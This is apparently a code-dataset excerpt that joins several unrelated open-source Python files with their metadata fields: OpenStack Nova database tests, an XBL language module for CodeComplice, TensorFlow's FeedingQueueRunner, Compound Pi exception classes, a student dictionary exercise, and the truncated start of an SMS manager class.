db.instance_group_members_add(self.context, group1.uuid, members)
group2 = db.instance_group_get_by_instance(self.context,
'instance_id1')
self.assertEqual(group2.uuid, group1.uuid)
class InstanceGroupMembersDBApiTestCase(InstanceGroupDBApiTestCase):
def test_instance_group_members_on_create(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
members = ['instance_id1', 'instance_id2']
result = self._create_instance_group(self.context, values,
members=members)
ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self._assertEqualObjects(result, values, ignored_keys)
self._assertEqualListsOfPrimitivesAsSets(result['members'], members)
def test_instance_group_members_add(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
result = self._create_instance_group(self.context, values)
id = result['uuid']
members = db.instance_group_members_get(self.context, id)
self.assertEqual(members, [])
members2 = ['instance_id1', 'instance_id2']
db.instance_group_members_add(self.context, id, members2)
members = db.instance_group_members_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(members, members2)
def test_instance_group_members_update(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
result = self._create_instance_group(self.context, values)
id = result['uuid']
members2 = ['instance_id1', 'instance_id2']
db.instance_group_members_add(self.context, id, members2)
members = db.instance_group_members_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(members, members2)
# check add with existing keys
members3 = ['instance_id1', 'instance_id2', 'instance_id3']
db.instance_group_members_add(self.context, id, members3)
members = db.instance_group_members_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(members, members3)
def test_instance_group_members_delete(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
result = self._create_instance_group(self.context, values)
id = result['uuid']
members3 = ['instance_id1', 'instance_id2', 'instance_id3']
db.instance_group_members_add(self.context, id, members3)
members = db.instance_group_members_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(members, members3)
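# Iterate over a copy of members3 so entries can be removed from the
# original list inside the loop.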
for instance_id in members3[:]:
db.instance_group_member_delete(self.context, id, instance_id)
members3.remove(instance_id)
members = db.instance_group_members_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(members, members3)
def test_instance_group_members_invalid_ids(self):
values = self._get_default_values()
result = self._create_instance_group(self.context, values)
id = result['uuid']
self.assertRaises(exception.InstanceGroupNotFound,
db.instance_group_members_get,
self.context, 'invalid')
self.assertRaises(exception.InstanceGroupNotFound,
db.instance_group_member_delete, self.context,
'invalidid', 'instance_id1')
members = ['instance_id1', 'instance_id2']
db.instance_group_members_add(self.context, id, members)
self.assertRaises(exception.InstanceGroupMemberNotFound,
db.instance_group_member_delete,
self.context, id, 'invalid_id')
class InstanceGroupPoliciesDBApiTestCase(InstanceGroupDBApiTestCase):
def test_instance_group_policies_on_create(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
policies = ['policy1', 'policy2']
result = self._create_instance_group(self.context, values,
policies=policies)
ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self._assertEqualObjects(result, values, ignored_keys)
self._assertEqualListsOfPrimitivesAsSets(result['policies'], policies)
class PciDeviceDBApiTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(PciDeviceDBApiTestCase, self).setUp()
self.user_id = 'fake_user'
self.project_id = 'fake_project'
self.context = context.RequestContext(self.user_id, self.project_id)
self.admin_context = context.get_admin_context()
self.ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self._compute_node = None
def _get_fake_pci_devs(self):
return {'id': 3353,
'compute_node_id': 1,
'address': '0000:0f:08.7',
'vendor_id': '8086',
'product_id': '1520',
'numa_node': 1,
'dev_type': 'type-VF',
'dev_id': 'pci_0000:0f:08.7',
'extra_info': None,
'label': 'label_8086_1520',
'status': 'available',
'instance_uuid': '00000000-0000-0000-0000-000000000010',
'request_id': None,
}, {'id': 3356,
'compute_node_id': 1,
'address': '0000:0f:03.7',
'vendor_id': '8083',
'product_id': '1523',
'numa_node': 0,
'dev_type': 'type-VF',
'dev_id': 'pci_0000:0f:08.7',
'extra_info': None,
'label': 'label_8086_1520',
'status': 'available',
'instance_uuid': '00000000-0000-0000-0000-000000000010',
'request_id': None,
}
@property
def compute_node(self):
if self._compute_node is None:
self._compute_node = db.compute_node_create(self.admin_context, {
'vcpus': 0,
'memory_mb': 0,
'local_gb': 0,
'vcpus_used': 0,
'memory_mb_used': 0,
'local_gb_used': 0,
'hypervisor_type': 'fake',
'hypervisor_version': 0,
'cpu_info': 'fake',
})
return self._compute_node
def _create_fake_pci_devs(self):
v1, v2 = self._get_fake_pci_devs()
for i in v1, v2:
i['compute_node_id'] = self.compute_node['id']
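# In these tests pci_device_update is used to create the rows, seeding
# both fake devices on the compute node.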
db.pci_device_update(self.admin_context, v1['compute_node_id'],
v1['address'], v1)
db.pci_device_update(self.admin_context, v2['compute_node_id'],
v2['address'], v2)
return (v1, v2)
def test_pci_device_get_by_addr(self):
v1, v2 = self._create_fake_pci_devs()
result = db.pci_device_get_by_addr(self.admin_context, 1,
'0000:0f:08.7')
self._assertEqualObjects(v1, result, self.ignored_keys)
def test_pci_device_get_by_addr_not_found(self):
self._create_fake_pci_devs()
self.assertRaises(exception.PciDeviceNotFound,
db.pci_device_get_by_addr, self.admin_context,
1, '0000:0f:08:09')
def test_pci_device_get_by_id(self):
v1, v2 = self._create_fake_pci_devs()
result = db.pci_device_get_by_id(self.admin_context, 3353)
self._assertEqualObjects(v1, result, self.ignored_keys)
def test_pci_device_get_by_id_not_found(self):
self._create_fake_pci_devs()
self.assertRaises(exception.PciDeviceNotFoundById,
db.pci_device_get_by_id,
self.admin_context, 3354)
def test_pci_device_get_all_by_node(self):
v1, v2 = self._create_fake_pci_devs()
results = db.pci_device_get_all_by_node(self.admin_context, 1)
self._assertEqualListsOfObjects(results, [v1, v2], self.ignored_keys)
def test_pci_device_get_all_by_node_empty(self):
v1, v2 = self._get_fake_pci_devs()
results = db.pci_device_get_all_by_node(self.admin_context, 9)
self.assertEqual(len(results), 0)
def test_pci_device_get_by_instance_uuid(self):
v1, v2 = self._create_fake_pci_devs()
v1['status'] = 'allocated'
v2['status'] = 'allocated'
db.pci_device_update(self.admin_context, v1['compute_node_id'],
v1['address'], v1)
db.pci_device_update(self.admin_context, v2['compute_node_id'],
v2['address'], v2)
results = db.pci_device_get_all_by_instance_uuid(
self.context,
'00000000-0000-0000-0000-000000000010')
self._assertEqualListsOfObjects(results, [v1, v2], self.ignored_keys)
def test_pci_device_get_by_instance_uuid_check_status(self):
v1, v2 = self._create_fake_pci_devs()
v1['status'] = 'allocated'
v2['status'] = 'claimed'
db.pci_device_update(self.admin_context, v1['compute_node_id'],
v1['address'], v1)
db.pci_device_update(self.admin_context, v2['compute_node_id'],
v2['address'], v2)
results = db.pci_device_get_all_by_instance_uuid(
self.context,
'00000000-0000-0000-0000-000000000010')
self._assertEqualListsOfObjects(results, [v1], self.ignored_keys)
def test_pci_device_update(self):
v1, v2 = self._create_fake_pci_devs()
v1['status'] = 'allocated'
db.pci_device_update(self.admin_context, v1['compute_node_id'],
v1['address'], v1)
result = db.pci_device_get_by_addr(
self.admin_context, 1, '0000:0f:08.7')
self._assertEqualObjects(v1, result, self.ignored_keys)
v1['status'] = 'claimed'
db.pci_device_update(self.admin_context, v1['compute_node_id'],
v1['address'], v1)
result = db.pci_device_get_by_addr(
self.admin_context, 1, '0000:0f:08.7')
self._assertEqualObjects(v1, result, self.ignored_keys)
def test_pci_device_destroy(self):
v1, v2 = self._create_fake_pci_devs()
results = db.pci_device_get_all_by_node(self.admin_context,
self.compute_node['id'])
self._assertEqualListsOfObjects(results, [v1, v2], self.ignored_keys)
db.pci_device_destroy(self.admin_context, v1['compute_node_id'],
v1['address'])
results = db.pci_device_get_all_by_node(self.admin_context,
self.compute_node['id'])
self._assertEqualListsOfObjects(results, [v2], self.ignored_keys)
def test_pci_device_destroy_exception(self):
v1, v2 = self._get_fake_pci_devs()
self.assertRaises(exception.PciDeviceNotFound,
db.pci_device_destroy,
self.admin_context,
v1['compute_node_id'],
v1['address'])
class RetryOnDeadlockTestCase(test.TestCase):
def test_without_deadlock(self):
@oslo_db_api.wrap_db_retry(max_retries=5,
retry_on_deadlock=True)
def call_api(*args, **kwargs):
return True
self.assertTrue(call_api())
def test_raise_deadlock(self):
self.attempts = 2
@oslo_db_api.wrap_db_retry(max_retries=5,
retry_on_deadlock=True)
def call_api(*args, **kwargs):
while self.attempts:
self.attempts = self.attempts - 1
raise db_exc.DBDeadlock("fake exception")
return True
self.assertTrue(call_api())
class TestSqlalchemyTypesRepr(test_base.DbTestCase):
def setUp(self):
super(TestSqlalchemyTypesRepr, self).setUp()
meta = MetaData(bind=self.engine)
self.table = Table(
'cidr_tbl',
meta,
Column('id', Integer, primary_key=True),
Column('addr', col_types.CIDR())
)
self.table.create()
self.addCleanup(meta.drop_all)
def test_cidr_repr(self):
addrs = [('192.168.3.0/24', '192.168.3.0/24'),
('2001:db8::/64', '2001:db8::/64'),
('192.168.3.0', '192.168.3.0/32'),
('2001:db8::', '2001:db8::/128'),
(None, None)]
with self.engine.begin() as conn:
for i in addrs:
conn.execute(self.table.insert(), {'addr': i[0]})
query = self.table.select().order_by(self.table.c.id)
result = conn.execute(query)
for idx, row in enumerate(result):
self.assertEqual(addrs[idx][1], row.addr)
class TestMySQLSqlalchemyTypesRepr(TestSqlalchemyTypesRepr,
test_base.MySQLOpportunisticTestCase):
pass
class TestPostgreSQLSqlalchemyTypesRepr(TestSqlalchemyTypesRepr,
test_base.PostgreSQLOpportunisticTestCase):
pass
class TestDBInstanceTags(test.TestCase):
sample_data = {
'project_id': 'project1',
'hostname': 'example.com',
'host': 'h1',
'node': 'n1',
'metadata': {'mkey1': 'mval1', 'mkey2': 'mval2'},
'system_metadata': {'smkey1': 'smval1', 'smkey2': 'smval2'},
'info_cache': {'ckey': 'cvalue'}
}
def setUp(self):
super(TestDBInstanceTags, self).setUp()
self.user_id = 'user1'
self.project_id = 'project1'
self.context = context.RequestContext(self.user_id, self.project_id)
def _create_instance(self):
inst = db.instance_create(self.context, self.sample_data)
return inst['uuid']
def _get_tags_from_resp(self, tag_refs):
return [(t.resource_id, t.tag) for t in tag_refs]
def test_instance_tag_add(self):
uuid = self._create_instance()
tag = 'tag'
tag_ref = db.instance_tag_add(self.context, uuid, tag)
self.assertEqual(uuid, tag_ref.resource_id)
self.assertEqual(tag, tag_ref.tag)
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
# Check the tag for the instance was added
tags = self._get_tags_from_resp(tag_refs)
self.assertEqual([(uuid, tag)], tags)
def test_instance_tag_add_duplication(self):
uuid = self._create_instance()
tag = 'tag'
for x in range(5):
db.instance_tag_add(self.context, uuid, tag)
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
# Check that only one tag was added for the instance
tags = self._get_tags_from_resp(tag_refs)
self.assertEqual([(uuid, tag)], tags)
def test_instance_tag_set(self):
uuid = self._create_instance()
tag1 = 'tag1'
tag2 = 'tag2'
tag3 = 'tag3'
tag4 = 'tag4'
# Set tags to the instance
db.instance_tag_set(self.context, uuid, [tag1, tag2])
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
# Check the tags for the instance were set
tags = self._get_tags_from_resp(tag_refs)
expected = [(uuid, tag1), (uuid, tag2)]
self.assertEqual(expected, tags)
# Set new tags to the instance
db.instance_tag_set(self.context, uuid, [tag3, tag4, tag2])
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
# Check the tags for the instance were replaced
tags = self._get_tags_from_resp(tag_refs)
expected = [(uuid, tag3), (uuid, tag4), (uuid, tag2)]
self.assertEqual(set(expected), set(tags))
def test_instance_tag_get_by_instance_uuid(self):
uuid1 = self._create_instance()
uuid2 = self._create_instance()
tag1 = 'tag1'
tag2 = 'tag2'
tag3 = 'tag3'
db.instance_tag_add(self.context, uuid1, tag1)
db.instance_tag_add(self.context, uuid2, tag1)
db.instance_tag_add(self.context, uuid2, tag2)
db.instance_tag_add(self.context, uuid2, tag3)
# Check the tags for the first instance
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid1)
tags = self._get_tags_from_resp(tag_refs)
expected = [(uuid1, tag1)]
self.assertEqual(expected, tags)
# Check the tags for the second instance
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid2)
tags = self._get_tags_from_resp(tag_refs)
expected = [(uuid2, tag1), (uuid2, tag2), (uuid2, tag3)]
self.assertEqual(expected, tags)
def test_instance_tag_get_by_instance_uuid_no_tags(self):
uuid = self._create_instance()
self.assertEqual([], db.instance_tag_get_by_instance_uuid(self.context,
uuid))
def test_instance_tag_delete(self):
uuid = self._create_instance()
tag1 = 'tag1'
tag2 = 'tag2'
db.instance_tag_add(self.context, uuid, tag1)
db.instance_tag_add(self.context, uuid, tag2)
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
tags = self._get_tags_from_resp(tag_refs)
expected = [(uuid, tag1), (uuid, tag2)]
# Check the tags for the instance were added
self.assertEqual(expected, tags)
db.instance_tag_delete(self.context, uuid, tag1)
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
tags = self._get_tags_from_resp(tag_refs)
expected = [(uuid, tag2)]
self.assertEqual(expected, tags)
def test_instance_tag_delete_non_existent(self):
uuid = self._create_instance()
self.assertRaises(exception.InstanceTagNotFound,
db.instance_tag_delete, self.context, uuid, 'tag')
def test_instance_tag_delete_all(self):
uuid = self._create_instance()
tag1 = 'tag1'
tag2 = 'tag2'
db.instance_tag_add(self.context, uuid, tag1)
db.instance_tag_add(self.context, uuid, tag2)
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
tags = self._get_tags_from_resp(tag_refs)
expected = [(uuid, tag1), (uuid, tag2)]
# Check the tags for the instance were added
self.assertEqual(expected, tags)
db.instance_tag_delete_all(self.context, uuid)
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
tags = self._get_tags_from_resp(tag_refs)
self.assertEqual([], tags)
def test_instance_tag_exists(self):
uuid = self._create_instance()
tag1 = 'tag1'
tag2 = 'tag2'
db.instance_tag_add(self.context, uuid, tag1)
# NOTE(snikitin): Make sure it's actually a bool
self.assertEqual(True, db.instance_tag_exists(self.context, uuid,
tag1))
self.assertEqual(False, db.instance_tag_exists(self.context, uuid,
tag2))
def test_instance_tag_add_to_non_existing_instance(self):
self._create_instance()
self.assertRaises(exception.InstanceNotFound, db.instance_tag_add,
self.context, 'fake_uuid', 'tag')
def test_instance_tag_set_to_non_existing_instance(self):
self._create_instance()
self.assertRaises(exception.InstanceNotFound, db.instance_tag_set,
self.context, 'fake_uuid', ['tag1', 'tag2'])
def test_instance_tag_get_from_non_existing_instance(self):
self._create_instance()
self.assertRaises(exception.InstanceNotFound,
db.instance_tag_get_by_instance_uuid, self.context,
'fake_uuid')
def test_instance_tag_delete_from_non_existing_instance(self):
self._create_instance()
self.assertRaises(exception.InstanceNotFound, db.instance_tag_delete,
self.context, 'fake_uuid', 'tag')
def test_instance_tag_delete_all_from_non_existing_instance(self):
self._create_instance()
self.assertRaises(exception.InstanceNotFound,
db.instance_tag_delete_all,
self.context, 'fake_uuid')
def test_instance_tag_exists_non_existing_instance(self):
self._create_instance()
self.assertRaises(exception.InstanceNotFound,
db.instance_tag_exists,
self.context, 'fake_uuid', 'tag')
| apache-2.0 | 926,845,915,533,690,500 | 43.990505 | 79 | 0.567316 | false |
anisku11/sublimeku | Packages/CodeComplice/libs/codeintel2/lang_xbl.py | 10 | 3211 | #!/usr/bin/env python
# ***** BEGIN LICENSE BLOCK *****
# Version: MPL 1.1/GPL 2.0/LGPL 2.1
#
# The contents of this file are subject to the Mozilla Public License
# Version 1.1 (the "License"); you may not use this file except in
# compliance with the License. You may obtain a copy of the License at
# http://www.mozilla.org/MPL/
#
# Software distributed under the License is distributed on an "AS IS"
# basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the
# License for the specific language governing rights and limitations
# under the License.
#
# The Original Code is Komodo code.
#
# The Initial Developer of the Original Code is ActiveState Software Inc.
# Portions created by ActiveState Software Inc are Copyright (C) 2000-2007
# ActiveState Software Inc. All Rights Reserved.
#
# Contributor(s):
# ActiveState Software Inc
#
# Alternatively, the contents of this file may be used under the terms of
# either the GNU General Public License Version 2 or later (the "GPL"), or
# the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
# in which case the provisions of the GPL or the LGPL are applicable instead
# of those above. If you wish to allow use of your version of this file only
# under the terms of either the GPL or the LGPL, and not to allow others to
# use your version of this file under the terms of the MPL, indicate your
# decision by deleting the provisions above and replace them with the notice
# and other provisions required by the GPL or the LGPL. If you do not delete
# the provisions above, a recipient may use your version of this file under
# the terms of any one of the MPL, the GPL or the LGPL.
#
# ***** END LICENSE BLOCK *****
"""XBL support for codeintel"""
import logging
from codeintel2.common import *
from codeintel2.udl import UDLLexer, UDLBuffer, UDLCILEDriver, XMLParsingBufferMixin
#---- globals
lang = "XBL"
log = logging.getLogger("codeintel.xbl")
#---- language support
class XBLLexer(UDLLexer):
lang = lang
class XBLBuffer(UDLBuffer, XMLParsingBufferMixin):
lang = lang
m_lang = "XML"
css_lang = "CSS"
csl_lang = "JavaScript"
# Characters that should close an autocomplete UI:
# - wanted for XML completion: ">'\" "
# - wanted for CSS completion: " ('\";},.>"
# - wanted for JS completion: "~`!@#%^&*()-=+{}[]|\\;:'\",.<>?/ "
# - dropping ':' because I think that may be a problem for XML tag
# completion with namespaces (not sure of that though)
# - dropping '[' because need for "<!<|>" -> "<![CDATA[" cpln
cpln_stop_chars = "'\" (;},~`!@#%^&*()-=+{}]|\\;,.<>?/"
# This gives global window completions but does not produce cile
# information, so completions for local variables and functions will
# not work.
class XBLCILEDriver(UDLCILEDriver):
lang = lang
csl_lang = "JavaScript"
#---- registration
def register(mgr):
"""Register language support with the Manager."""
mgr.set_lang_info(lang,
silvercity_lexer=XBLLexer(),
buf_class=XBLBuffer,
import_handler_class=None,
cile_driver_class=XBLCILEDriver,
is_cpln_lang=True)
| mit | 4,609,207,670,450,474,000 | 35.488636 | 84 | 0.680162 | false |
handroissuazo/tensorflow | tensorflow/contrib/learn/python/learn/dataframe/queues/feeding_queue_runner.py | 37 | 6897 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A `QueueRunner` that takes a feed function as an argument."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
from tensorflow.python.framework import errors
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import queue_runner as qr
class FeedingQueueRunner(qr.QueueRunner):
"""A queue runner that allows the feeding of values such as numpy arrays."""
def __init__(self, queue=None, enqueue_ops=None, close_op=None,
cancel_op=None, feed_fns=None,
queue_closed_exception_types=None):
"""Initialize the queue runner.
For further documentation, see `queue_runner.py`. Note that
`FeedingQueueRunner` does not support construction from protobuffer nor
serialization to protobuffer.
Args:
queue: A `Queue`.
enqueue_ops: List of enqueue ops to run in threads later.
close_op: Op to close the queue. Pending enqueue ops are preserved.
cancel_op: Op to close the queue and cancel pending enqueue ops.
feed_fns: a list of functions that return a dictionary mapping fed
`Tensor`s to values. Must be the same length as `enqueue_ops`.
queue_closed_exception_types: Optional tuple of Exception types that
indicate that the queue has been closed when raised during an enqueue
operation. Defaults to
`(tf.errors.OutOfRangeError, tf.errors.CancelledError)`.
Raises:
ValueError: `feed_fns` is not `None` and has different length than
`enqueue_ops`.
"""
if queue_closed_exception_types is None:
queue_closed_exception_types = (
errors.OutOfRangeError, errors.CancelledError)
super(FeedingQueueRunner, self).__init__(
queue, enqueue_ops, close_op,
cancel_op, queue_closed_exception_types=queue_closed_exception_types)
if feed_fns is None:
self._feed_fns = [None for _ in enqueue_ops]
else:
if len(feed_fns) != len(enqueue_ops):
raise ValueError(
"If feed_fns is not None, it must have the same length as "
"enqueue_ops.")
self._feed_fns = feed_fns
# pylint: disable=broad-except
def _run(self, sess, enqueue_op, feed_fn, coord=None):
"""Execute the enqueue op in a loop, close the queue in case of error.
Args:
sess: A `Session`.
enqueue_op: The `Operation` to run.
feed_fn: the feed function to pass to `sess.run`.
coord: Optional `Coordinator` object for reporting errors and checking
for stop conditions.
"""
# TODO(jamieas): Reduce code duplication with `QueueRunner`.
if coord:
coord.register_thread(threading.current_thread())
decremented = False
try:
while True:
if coord and coord.should_stop():
break
try:
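# Ask the feed function (if any) for a fresh feed_dict on every enqueue.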
feed_dict = None if feed_fn is None else feed_fn()
sess.run(enqueue_op, feed_dict=feed_dict)
except (errors.OutOfRangeError, errors.CancelledError):
# This exception indicates that a queue was closed.
with self._lock:
self._runs_per_session[sess] -= 1
decremented = True
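# The last enqueue thread to finish for this session is responsible
# for closing the queue.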
if self._runs_per_session[sess] == 0:
try:
sess.run(self._close_op)
except Exception as e:
# Intentionally ignore errors from close_op.
logging.vlog(1, "Ignored exception: %s", str(e))
return
except Exception as e:
# This catches all other exceptions.
if coord:
coord.request_stop(e)
else:
logging.error("Exception in QueueRunner: %s", str(e))
with self._lock:
self._exceptions_raised.append(e)
raise
finally:
# Make sure we account for all terminations: normal or errors.
if not decremented:
with self._lock:
self._runs_per_session[sess] -= 1
def create_threads(self, sess, coord=None, daemon=False, start=False):
"""Create threads to run the enqueue ops for the given session.
This method requires a session in which the graph was launched. It creates
a list of threads, optionally starting them. There is one thread for each
op passed in `enqueue_ops`.
The `coord` argument is an optional coordinator that the threads will use
to terminate together and report exceptions. If a coordinator is given,
this method starts an additional thread to close the queue when the
coordinator requests a stop.
If previously created threads for the given session are still running, no
new threads will be created.
Args:
sess: A `Session`.
coord: Optional `Coordinator` object for reporting errors and checking
stop conditions.
daemon: Boolean. If `True` make the threads daemon threads.
start: Boolean. If `True` starts the threads. If `False` the
caller must call the `start()` method of the returned threads.
Returns:
A list of threads.
"""
with self._lock:
try:
if self._runs_per_session[sess] > 0:
# Already started: no new threads to return.
return []
except KeyError:
# We haven't seen this session yet.
pass
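# Track one pending run per enqueue op so _run can tell when the last
# thread for this session has finished.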
self._runs_per_session[sess] = len(self._enqueue_ops)
self._exceptions_raised = []
ret_threads = [threading.Thread(target=self._run,
args=(sess, op, feed_fn, coord))
for op, feed_fn in zip(self._enqueue_ops, self._feed_fns)]
if coord:
ret_threads.append(threading.Thread(target=self._close_on_stop,
args=(sess, self._cancel_op, coord)))
for t in ret_threads:
if daemon:
t.daemon = True
if start:
t.start()
return ret_threads
def _init_from_proto(self, queue_runner_def):
raise NotImplementedError(
"{} does not support initialization from proto.".format(type(
self).__name__))
def to_proto(self):
raise NotImplementedError(
"{} does not support serialization to proto.".format(type(
self).__name__))
| apache-2.0 | 4,977,298,174,269,079,000 | 37.316667 | 80 | 0.641438 | false |
waveform80/compoundpi | compoundpi/exc.py | 1 | 7202 | # vim: set et sw=4 sts=4 fileencoding=utf-8:
# Copyright 2014 Dave Jones <[email protected]>.
#
# This file is part of compoundpi.
#
# compoundpi is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 2 of the License, or (at your option) any later
# version.
#
# compoundpi is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# compoundpi. If not, see <http://www.gnu.org/licenses/>.
"Defines all exceptions and warnings used by Compound Pi"
from __future__ import (
unicode_literals,
absolute_import,
print_function,
division,
)
str = type('')
class CompoundPiWarning(Warning):
"Base class for warnings raised by the Compound Pi suite"
class CompoundPiClientWarning(CompoundPiWarning):
"Warning raised when the Compound Pi client does something unexpected"
def __init__(self, address, msg):
super(CompoundPiClientWarning, self).__init__(
'%s: %s' % (address, msg))
self.address = address
class CompoundPiServerWarning(CompoundPiWarning):
"Warning raised when a Compound Pi server does something unexpected"
def __init__(self, address, msg):
super(CompoundPiServerWarning, self).__init__(
'%s: %s' % (address, msg))
self.address = address
class CompoundPiWrongPort(CompoundPiServerWarning):
"Warning raised when packets are received from the wrong port"
def __init__(self, address, port):
super(CompoundPiWrongPort, self).__init__(
address, 'response from wrong port %d' % port)
class CompoundPiUnknownAddress(CompoundPiServerWarning):
"Warning raised when a packet is received from an unexpected address"
def __init__(self, address):
super(CompoundPiUnknownAddress, self).__init__(
address, 'unknown server')
class CompoundPiMultiResponse(CompoundPiServerWarning):
"Warning raised when multiple responses are received"
def __init__(self, address):
super(CompoundPiMultiResponse, self).__init__(
address, 'multiple responses received')
class CompoundPiBadResponse(CompoundPiServerWarning):
"Warning raised when a response is badly formed"
def __init__(self, address):
super(CompoundPiBadResponse, self).__init__(
address, 'badly formed response')
class CompoundPiStaleResponse(CompoundPiServerWarning):
"Warning raised when a stale response (old sequence number) is received"
def __init__(self, address):
super(CompoundPiStaleResponse, self).__init__(
address, 'stale response')
class CompoundPiFutureResponse(CompoundPiServerWarning):
"Warning raised when a response with a future sequence number is received"
def __init__(self, address):
super(CompoundPiFutureResponse, self).__init__(
address, 'future response')
class CompoundPiWrongVersion(CompoundPiServerWarning):
"Warning raised when a server reports an incompatible version"
def __init__(self, address, version):
super(CompoundPiWrongVersion, self).__init__(
address, 'wrong version "%s"' % version)
self.version = version
class CompoundPiHelloError(CompoundPiServerWarning):
"Warning raised when a server reports an error in response to HELLO"
def __init__(self, address, error):
super(CompoundPiHelloError, self).__init__(address, error)
self.error = error
class CompoundPiStaleSequence(CompoundPiClientWarning):
def __init__(self, address, seqno):
super(CompoundPiStaleSequence, self).__init__(
address, 'Stale sequence number %d' % seqno)
class CompoundPiStaleClientTime(CompoundPiClientWarning):
def __init__(self, address, ts):
super(CompoundPiStaleClientTime, self).__init__(
address, 'Stale client time %f' % ts)
class CompoundPiInvalidClient(CompoundPiClientWarning):
def __init__(self, address):
super(CompoundPiInvalidClient, self).__init__(
address, 'Invalid client or protocol error')
class CompoundPiError(Exception):
"Base class for errors raised by the Compound Pi suite"
class CompoundPiClientError(CompoundPiError):
"Base class for client-side errors (configuration, usage, etc.)"
class CompoundPiServerError(CompoundPiError):
"Base class for server-side errors which associates an address with the message"
def __init__(self, address, msg):
super(CompoundPiServerError, self).__init__('%s: %s' % (address, msg))
self.address = address
class CompoundPiTransactionFailed(CompoundPiError):
"Compound exception which represents all errors encountered in a transaction"
def __init__(self, errors, msg=None):
if msg is None:
msg = '%d errors encountered while executing' % len(errors)
msg = '\n'.join([msg] + [str(e) for e in errors])
super(CompoundPiTransactionFailed, self).__init__(msg)
self.errors = errors
class CompoundPiNoServers(CompoundPiClientError):
"Exception raised when a command is execute with no servers defined"
def __init__(self):
super(CompoundPiNoServers, self).__init__('no servers defined')
class CompoundPiUndefinedServers(CompoundPiClientError):
"Exception raised when a transaction is attempted with undefined servers"
def __init__(self, addresses):
super(CompoundPiUndefinedServers, self).__init__(
'transaction with undefined servers: %s' %
','.join(str(addr) for addr in addresses))
class CompoundPiRedefinedServer(CompoundPiClientError):
"Exception raised when a server is added to the list twice"
def __init__(self, address):
super(CompoundPiRedefinedServer, self).__init__(
'server already defined: %s' % address)
class CompoundPiInvalidResponse(CompoundPiServerError):
"Exception raised when a server returns an unexpected response"
def __init__(self, address):
super(CompoundPiInvalidResponse, self).__init__(
address, 'invalid response')
class CompoundPiMissingResponse(CompoundPiServerError):
"Exception raised when a server fails to return a response"
def __init__(self, address):
super(CompoundPiMissingResponse, self).__init__(
address, 'no response')
class CompoundPiSendTimeout(CompoundPiServerError):
"Exception raised when a server fails to open a connection for SEND"
def __init__(self, address):
super(CompoundPiSendTimeout, self).__init__(
address, 'timed out waiting for SEND connection')
class CompoundPiSendTruncated(CompoundPiServerError):
"Exception raised when a server doesn't send enough data for SEND"
def __init__(self, address):
super(CompoundPiSendTruncated, self).__init__(
address, 'unexpected EOF during SEND')
| gpl-2.0 | -8,593,408,775,321,409,000 | 32.497674 | 84 | 0.693557 | false |
xbash/LabUNAB | 11_diccionarios/01_diccionario.py | 1 | 1078 | #-------------------------------------------------------------------------------
# Name: 01_diccionario
# Purpose:
#
# Author: jsepulveda
#
# Created: 18-10-2016
# Copyright: (c) jsepulveda 2016
# Licence: <your licence>
#-------------------------------------------------------------------------------
alumnos = [{
"nombre":"Juan",
"fecha_nac":(1992,7,2),
"familia":{"papa":"Pedro","mama":"Luisa"},
"cursos":[
{"sigla":"ING133","notas":[7,6,5.2]},
{"sigla":"FIS120","notas":[6,4,3]}]
},{
"nombre":"Jorge",
"fecha_nac":(1983,7,2),
"familia":{"papa":"Mario","mama":"Maria"},
"cursos":[
{"sigla":"INF320","notas":[7,6,5.2]},
{"sigla":"MAT120","notas":[6,4,3]}]
}]
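# Second grade of the first student's second course (FIS120).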
print(alumnos[0]["cursos"][1]["notas"][1])
for alumno in alumnos:
print("")
print("Notas de "+alumno["nombre"])
for curso in alumno["cursos"]:
suma = 0
for nota in curso["notas"]:
suma += nota
promedio = round(suma/len(curso["notas"]),1)
print("curso "+curso["sigla"]+": "+str(promedio)) | gpl-3.0 | 4,461,117,359,344,268,300 | 28 | 80 | 0.447124 | false |
jawrainey/sris | sris/manager.py | 1 | 7789 | from sris import db, models
from messenger import Messenger
from service import SMSService
from datetime import datetime
class Manager:
"""
The middle-man of interaction between messenger and the SMS service.
"""
def __init__(self):
self.config = self.__load_config_file()
self.messenger = Messenger(self.config)
self.sms_service = SMSService()
def send_initial_greeting(self):
"""
